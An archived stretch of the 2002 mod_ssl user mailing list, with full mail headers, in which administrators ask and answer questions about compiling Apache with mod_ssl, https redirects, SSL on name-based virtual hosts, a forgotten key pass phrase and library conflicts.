charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mathieu Arnold X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I was wondering if it may be possible to configure modssl to do crypto with no certificate. I know that it should be possible because certificates are just a way to authenticate the server, not to establish the crypto. -- Mathieu Arnold ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 03:02:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA00354; Sat, 9 Feb 2002 03:01:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA00313; Sat, 9 Feb 2002 03:00:55 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A88EA4CE5F1; Sat, 9 Feb 2002 03:00:54 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g18LBP999584; Fri, 8 Feb 2002 22:11:25 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from liberta.w4w.net id TAA09915; Fri, 8 Feb 2002 19:35:07 +0100 (MET) Received: by liberta.w4w.net (8.11.6/nora-20001125) with ESMTP from zora (pD9043FB8.dip.t-dialin.net [217.4.63.184]) (envelope-from nti@w4w.net) authenticated as nti with LOGIN id g18IZ2K41834; Fri, 8 Feb 2002 19:35:04 +0100 (CET) Apparently-To: modssl-users@modssl.org From: "Nicola Tiling" To: Subject: Problem compiling apache 1.3.23 with mod_ssl Date: Fri, 8 Feb 2002 19:34:59 +0100 Message-ID: <000f01c1b0cf$50b2d2a0$c92ca8c0@zora> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Nicola Tiling" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi all We have problems to compile Apache with mod_ssl on FreeBSD 4.4 *Without* mod_ssl everything works fine but with mod_ssl compiling stops with: ===> src/main gcc -c -I/usr/local/include -I../os/unix -I../include -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` gen_test_char.c gcc -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` -L/usr/local/lib -L ..//usr/ports/graphics/gd2 -o gen_test_char gen_test_char.o -lcrypt -lmm ./gen_test_char >test_char.h gcc -c -I/usr/local/include -I../os/unix -I../include -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` gen_uri_delims.c gcc -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` -L/usr/local/lib -L ..//usr/ports/graphics/gd2 -o gen_uri_delims gen_uri_delims.o -lcrypt -lmm ./gen_uri_delims >uri_delims.h gcc -c -I/usr/local/include -I../os/unix -I../include -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` alloc.c gcc -c -I/usr/local/include -I../os/unix -I../include -funsigned-char -DMOD_SSL=208106 -DEAPI -DEAPI_MM -DUSE_EXPAT -I../lib/expat-lite -I/usr/local/ssl/include/openssl `../apaci` buff.c buff.c: In function `buff_write': buff.c:367: structure has no member named `filter_callback' buff.c:368: structure has no member named `filter_callback' buff.c: In function `ap_bcreate': buff.c:456: structure has no member named `callback_data' buff.c:457: structure has no member named `filter_callback' buff.c: In function `writev_it_all': buff.c:1103: structure has no member named `filter_callback' buff.c:1105: structure has no member named `filter_callback' *** Error code 1 Stop in /var/src/local/apache/apache_1.3.23/src/main. *** Error code 1 Stop in /var/src/local/apache/apache_1.3.23/src. *** Error code 1 Stop in /var/src/local/apache/apache_1.3.23. *** Error code 1 Stop in /var/src/local/apache/apache_1.3.23. The diffs in buff.c before and after making mod_ssl are diff buff.c buff.c.org 276,278d275 < #ifdef EAPI < if (!ap_hook_call("ap::buff::read", &rv, fb, buf, nbyte)) < #endif /* EAPI */ 290,292d286 < #ifdef EAPI < if (!ap_hook_call("ap::buff::recvwithtimeout", &rv, fb, buf, nbyte)) < #endif /* EAPI */ 340,342d333 < #ifdef EAPI < if (!ap_hook_call("ap::buff::write", &rv, fb, buf, nbyte)) < #endif /* EAPI */ 373,375d363 < #ifdef EAPI < if (!ap_hook_call("ap::buff::sendwithtimeout", &rv, fb, buf, nbyte)) < #endif /* EAPI */ 459,462d446 < #ifdef EAPI < fb->ctx = ap_ctx_new(p); < #endif /* EAPI */ < 1115,1117d1098 < #ifdef EAPI < if (!ap_hook_call("ap::buff::writev", &rv, fb, &vec[i], nvec -i)) < #endif /* EAPI */ greetings Nicola ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 04:45:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA04501; Sat, 9 Feb 2002 04:44:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.verizonwireless.com id EAA04470; Sat, 9 Feb 2002 04:43:06 +0100 (MET) From: Adam.Dorenter@VerizonWireless.com Received: from mail.verizonwireless.com by mail.verizonwireless.com (414/1100) with ESMTP id g193h2L20986 for ; Fri, 8 Feb 2002 22:43:02 -0500 (EST) Received: by hqbedjvgwy.corp.bam.com with Internet Mail Service (5.5.2654.89) id <1B5JN73G>; Fri, 8 Feb 2002 22:43:02 -0500 Message-ID: To: modssl-users@modssl.org Subject: Netscape Security Library Out Of Memory Error Date: Fri, 8 Feb 2002 22:43:00 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2654.89) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Adam.Dorenter@VerizonWireless.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All. I'm new to the group, and I'm sure this questions has been asked before, but I am having problem getting certain versions of netscape to correctly load my apache+mod_ssl+open_ssl webpage. The certificate is accepted, but when client authentication is performed by Apache netscape users get the "Security Library Out Of Memory Error." The odd this is that it only seems to happend when I have enable .htaccess user authentication and the certificate acceptance appears to be working correctly. Any ideas? -- Adam ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 12:28:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22531; Sat, 9 Feb 2002 12:27:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA22507; Sat, 9 Feb 2002 12:26:32 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 707684CE74C; Sat, 9 Feb 2002 12:26:31 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g19BPqv12505; Sat, 9 Feb 2002 12:25:52 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from ulairi.csun.edu id CAA00204; Sat, 9 Feb 2002 02:59:38 +0100 (MET) From: ulairi@csun.edu Received: (qmail 14456 invoked by uid 60001); 9 Feb 2002 01:57:50 -0000 Received: from 130.166.10.27 ( [130.166.10.27]) as user ulairi@ulairi.csun.edu by ulairi.csun.edu with HTTP; Fri, 8 Feb 2002 17:57:50 +0800 Message-ID: <1013219870.3c64821e61b90@ulairi.csun.edu> Date: Fri, 8 Feb 2002 17:57:50 +0800 To: modssl-users@modssl.org Cc: obo@bourse.ch Subject: Re: directing http --> https References: <3C62691D.87F841A6@bourse.ch> In-Reply-To: <3C62691D.87F841A6@bourse.ch> MIME-Version: 1.0 Content-Type: text/plain; charset=windows-1252;q=1.0 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: ulairi@csun.edu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Quoting Owen Boyle : > If you want to be more specific so that > http://d.com/foo/bar.html --> https://d.com/foo/bar.html > then use something like: > > RedirectMatch (.*) https://d.com$1 > Won't this create an infinate loop? I could be wrong, but I think RedirectMatch will pick up the hit via http or https, and attempt to send the user to https://d.com$1 even if the user came via https in the first place. mod_rewrite seems to be the only alternative I've seen so far. If I'm wrong, let me know... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 12:28:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA22540; Sat, 9 Feb 2002 12:27:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA22508; Sat, 9 Feb 2002 12:26:32 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7CA294CE74E; Sat, 9 Feb 2002 12:26:31 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g19BPsC12511; Sat, 9 Feb 2002 12:25:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from citarum.cabi.net.id id DAA02217; Sat, 9 Feb 2002 03:45:14 +0100 (MET) Received: from GLOBAL1 (host-202.153.253.254-personal-broadband.mweb.net.id [202.153.253.254] (may be forged)) by citarum.cabi.net.id (8.11.1/8.11.1) with SMTP id g192dWg03644 for ; Sat, 9 Feb 2002 09:39:37 +0700 Message-ID: <002101c1b114$15ecfe80$0b64a8c0@MEDIA> From: "Denny Suvanto" To: Subject: Mod_SSL with Name Based Virtual Hosts Date: Sat, 9 Feb 2002 09:46:56 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001E_01C1B14E.B693F5C0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Denny Suvanto" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_001E_01C1B14E.B693F5C0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear guys, Can I use mod_ssl for separate domains with the same IP address using name based virtual hosts? If so, how? Thanks=20 Best Regards Yohanes Denny Suvanto ------=_NextPart_000_001E_01C1B14E.B693F5C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dear guys,
 
Can I use mod_ssl = for  separate=20 domains with the same IP address
using name based virtual = hosts?
If so, how?
Thanks
 
Best Regards
Yohanes Denny Suvanto
 
------=_NextPart_000_001E_01C1B14E.B693F5C0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 12:46:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA23304; Sat, 9 Feb 2002 12:45:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d101.x-mailer.de id MAA23274; Sat, 9 Feb 2002 12:44:39 +0100 (MET) Received: from [127.0.0.1] (helo=there) by d101.x-mailer.de with smtp (Exim 3.33 #3) id 16ZVs7-000551-00 for modssl-users@modssl.org; Sat, 09 Feb 2002 12:40:47 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Andreas Gietl To: modssl-users@modssl.org Subject: Re: Mod_SSL with Name Based Virtual Hosts Date: Sat, 9 Feb 2002 12:42:18 +0100 X-Mailer: KMail [version 1.3.2] References: <002101c1b114$15ecfe80$0b64a8c0@MEDIA> In-Reply-To: <002101c1b114$15ecfe80$0b64a8c0@MEDIA> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andreas Gietl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Saturday 09 February 2002 03:46, you wrote: No this isn't possible because as far as i know there's no HTTP/1.1-like Hostname Extension to the https-protocol. > Dear guys, > > Can I use mod_ssl for separate domains with the same IP address > using name based virtual hosts? > If so, how? > Thanks > > Best Regards > Yohanes Denny Suvanto -- e-admin internet gmbh Andreas Gietl Roter-Brach-Weg 124a tel +49 941 3810884 fax +49 941 3810891 mobil +49 171 6070008 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 12:48:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA23417; Sat, 9 Feb 2002 12:47:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d101.x-mailer.de id MAA23350; Sat, 9 Feb 2002 12:46:20 +0100 (MET) Received: from [127.0.0.1] (helo=there) by d101.x-mailer.de with smtp (Exim 3.33 #3) id 16ZVtk-0005A9-00 for modssl-users@modssl.org; Sat, 09 Feb 2002 12:42:28 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Andreas Gietl To: modssl-users@modssl.org Subject: Re: strange problem with unclean shutdown Date: Sat, 9 Feb 2002 12:43:59 +0100 X-Mailer: KMail [version 1.3.2] References: <20020208175909.A27181@runt.ebetinc.com> In-Reply-To: <20020208175909.A27181@runt.ebetinc.com> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andreas Gietl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Saturday 09 February 2002 02:59, you wrote: There's just one host at this SSL-Server. XXX is the IP-Adress of the SSL-Host. I already tried to work with the shm-cache, but this didn't work. > On Wed, Jan 23, 2002 at 07:12:35PM +0100, Andreas Gietl wrote: > > > > ServerName www.defaulthost.de > > ServerAdmin webmaster@defaulthost.de > > DocumentRoot /home/defaulthost/public_html > > Sorry for the late reply, been on vacation. > > Does this server host multiple SSL sites? What are you using in your > configuration of XXXXXXX? > > Can you replace XXXXXXX with * or the IP address of the virtual host? > > -Dave > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- e-admin internet gmbh Andreas Gietl Roter-Brach-Weg 124a tel +49 941 3810884 fax +49 941 3810891 mobil +49 171 6070008 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 21:17:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA12956; Sat, 9 Feb 2002 21:16:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA12942; Sat, 9 Feb 2002 21:15:51 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A36A44CE581; Sat, 9 Feb 2002 21:15:50 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g19JGPH18511; Sat, 9 Feb 2002 20:16:25 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gadolinium.btinternet.com id TAA09211; Sat, 9 Feb 2002 19:42:58 +0100 (MET) Received: from host213-122-177-161.in-addr.btopenworld.com ([213.122.177.161] helo=there) by gadolinium.btinternet.com with smtp (Exim 3.22 #8) id 16ZcSZ-0002hC-00 for modssl-users@modssl.org; Sat, 09 Feb 2002 18:42:52 +0000 Content-Type: text/plain; charset="iso-8859-15" From: Scott Taylor Organization: 4i dotCom Limited To: modssl-users@modssl.org Subject: SSL Pass phrase Date: Sat, 9 Feb 2002 18:36:55 +0000 X-Mailer: KMail [version 1.3.1] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Scott Taylor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I believe I have successfully configured Apache/PHP/mod_ssl/openssl on Red Hat 7.2. When starting SSL with "./apachectl startssl" I get: Server localhost.localdomain:443 (RSA) Enter pass phrase: I put my password in and get: Apache:mod_ssl:Error: Pass phrase incorrect I thought that this was the pass phrase I entered when "making" the certificate. I am sure I knew (and still believe) the correct pass phrase. However, is there a way of finding out from my system files? I have tried to understand the typically obscure instructions that come with software but have failed. Is it "openssl rsa -noout -text -in server.key" where server.key is the file in the /apache/conf/ssl.key directory? The result is: read RSA key Enter PEM pass phrase: I enter password and get: unable to load key 14555:error:06065064:digital envelope routines:EVP_DecryptFinal:bad decrypt:evp_enc.c:277: 14555:error:0906A065:PEM routines:PEM_do_header:bad decrypt:pem_lib.c.451: If someone has an answer, could they please tell me exactly where I should run the relevant command. Please help Regards Scott ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 9 21:48:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13919; Sat, 9 Feb 2002 21:47:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id VAA13905; Sat, 9 Feb 2002 21:46:44 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA26130 for ; Sat, 9 Feb 2002 15:53:06 -0500 Date: Sat, 9 Feb 2002 15:53:06 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: SSL Pass phrase In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sounds like perhaps you fat-fingers it as entering it, or are not using caps or special chars you did when you entered it. I'ts case sensitivve, so caps count, spcial chars count. did you start the passphrase, typo then backspace? if so, try that excat sequence and see if it works for ya. Barring that your quickest fix is to redo the certs... Thanks, Ron DuFresne On Sat, 9 Feb 2002, Scott Taylor wrote: > I believe I have successfully configured Apache/PHP/mod_ssl/openssl on Red > Hat 7.2. > > When starting SSL with "./apachectl startssl" I get: > > Server localhost.localdomain:443 (RSA) > Enter pass phrase: > > I put my password in and get: > > Apache:mod_ssl:Error: Pass phrase incorrect > > I thought that this was the pass phrase I entered when "making" the > certificate. I am sure I knew (and still believe) the correct pass phrase. > > However, is there a way of finding out from my system files? > > I have tried to understand the typically obscure instructions that come with > software but have failed. > > Is it "openssl rsa -noout -text -in server.key" where server.key is the file > in the /apache/conf/ssl.key directory? The result is: > > read RSA key > Enter PEM pass phrase: > > I enter password and get: > > unable to load key > 14555:error:06065064:digital envelope routines:EVP_DecryptFinal:bad > decrypt:evp_enc.c:277: > 14555:error:0906A065:PEM routines:PEM_do_header:bad decrypt:pem_lib.c.451: > > > If someone has an answer, could they please tell me exactly where I should > run the relevant command. > > Please help > > Regards > > Scott > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 10 18:15:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA01935; Sun, 10 Feb 2002 18:14:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA01916; Sun, 10 Feb 2002 18:13:09 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1000) id 6A4C14CE74A; Sun, 10 Feb 2002 18:13:09 +0100 (CET) Date: Sun, 10 Feb 2002 18:13:09 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: directing http --> https Message-ID: <20020210181309.A15461@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.23i Organization: Engelschall, Germany. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In article <1013219870.3c64821e61b90@ulairi.csun.edu> you wrote: > Quoting Owen Boyle : > >> If you want to be more specific so that >> http://d.com/foo/bar.html --> https://d.com/foo/bar.html >> then use something like: >> >> RedirectMatch (.*) https://d.com$1 >> > > Won't this create an infinate loop? > I could be wrong, but I think RedirectMatch will pick up the hit via http or https, and attempt to send the user to https://d.com$1 even if the user came via https in the first place. > > mod_rewrite seems to be the only alternative I've seen so far. If I'm > wrong, let me know... Either you have to put the RedirectMatch only into the of the HTTP-only virtual server or (in case you do it globally) you have to use a RewriteRule with a RewriteCond which checks the %{HTTPS} variable to avoid looping. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 10 18:17:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA02015; Sun, 10 Feb 2002 18:16:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id SAA01996; Sun, 10 Feb 2002 18:15:34 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1000) id 45E7F4CE749; Sun, 10 Feb 2002 18:15:34 +0100 (CET) Date: Sun, 10 Feb 2002 18:15:34 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: https without certificate Message-ID: <20020210181534.A15497@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.23i Organization: Engelschall, Germany. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In article <3C641CF3.54853C55@club-internet.fr> you wrote: > I was wondering if it may be possible to configure modssl to do crypto > with no certificate. No. > I know that it should be possible because certificates are just a way to > authenticate the server, not to establish the crypto. No, the server certificate is also important and required for the secure exchange of the crytography parameters of SSL/TLS. Without this, the client and server would not be able to securely exchange the necessary symmetric encryption parameters. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 10 21:18:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA08957; Sun, 10 Feb 2002 21:17:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id VAA08917; Sun, 10 Feb 2002 21:15:58 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16a06X-0006uN-00 for ; Sun, 10 Feb 2002 11:57:41 -0800 Date: Sun, 10 Feb 2002 11:57:41 -0800 To: modssl-users@modssl.org Subject: Re: Mod_SSL with Name Based Virtual Hosts Message-ID: <20020210195741.GA26527@squaretrade.com> References: <002101c1b114$15ecfe80$0b64a8c0@MEDIA> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <002101c1b114$15ecfe80$0b64a8c0@MEDIA> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you can do it by using different ports, but then you'll have to construct URL's like: https://secure.domain.com:8443/path/to/resource it's a limitation of the protocol. glen On Sat, Feb 09, 2002 at 09:46:56AM +0700, Denny Suvanto wrote: > Dear guys, > > Can I use mod_ssl for separate domains with the same IP address > using name based virtual hosts? > If so, how? > Thanks > > Best Regards > Yohanes Denny Suvanto > -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 00:45:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA17628; Mon, 11 Feb 2002 00:44:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate.hiddentower.com id AAA17591; Mon, 11 Feb 2002 00:42:31 +0100 (MET) Received: from lookout.hiddentower.com (lookout.hiddentower.com [192.168.1.2]) by gate.hiddentower.com (Postfix) with ESMTP id 9A0A2188C88 for ; Mon, 11 Feb 2002 12:42:27 +1300 (NZDT) Date: Mon, 11 Feb 2002 12:42:29 +1300 Mime-Version: 1.0 (Apple Message framework v480) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: install Net::SSLeay cause problems with apache libssl.so From: Brian Young To: modssl-users@modssl.org Content-Transfer-Encoding: 7bit Message-Id: X-Mailer: Apple Mail (2.480) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brian Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I recently installed the perl SSLeay module. After I did this, the mod_ssl apache module stopped working and my browser gives me the following error when trying to connect via https: Unable to connect, SSL_connect() failed: [397:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:460: ] Until I installed SSLeay the apache config worked perfectly. The appache error log does not show any messages when a browser attempts to access via SSL. I am not 100% sure that the SSLeay install caused my problems, but I have not found anything else could have interfered with my installed system. Can anyone suggest what may have happened, or a good way to trouble shoot this problem? Thank you -Brian Young Software versions: Mac OS X 10.1.2 Apache/1.3.22 (Darwin) mod_ssl/2.8.5 OpenSSL/0.9.5a. NET::SSLeay v1.12 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 04:01:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA24526; Mon, 11 Feb 2002 03:59:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate.hiddentower.com id DAA24486; Mon, 11 Feb 2002 03:58:23 +0100 (MET) Received: from lookout.hiddentower.com (lookout.hiddentower.com [192.168.1.2]) by gate.hiddentower.com (Postfix) with ESMTP id AC21E189C6B for ; Mon, 11 Feb 2002 15:58:19 +1300 (NZDT) Date: Mon, 11 Feb 2002 15:58:21 +1300 Subject: Re: install Net::SSLeay cause problems with apache libssl.so Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v480) From: Brian Young To: modssl-users@modssl.org Content-Transfer-Encoding: 7bit In-Reply-To: Message-Id: <352E5F9E-1E9B-11D6-9E33-003065EA71BE@hiddentower.com> X-Mailer: Apple Mail (2.480) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brian Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am sorry. I spoke too soon. I have gotten ssl working again and you can ignore this post. -Brian Young On Monday, February 11, 2002, at 12:42 PM, Brian Young wrote: > Hello, > > I recently installed the perl SSLeay module. After I did this, the > mod_ssl apache module stopped working and my browser gives me the > following error when trying to connect via https: > > Unable to connect, SSL_connect() failed: [397:error:140770FC:SSL > routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:460: ] > > Until I installed SSLeay the apache config worked perfectly. The > appache error log does not show any messages when a browser attempts to > access via SSL. I am not 100% sure that the SSLeay install caused my > problems, but I have not found 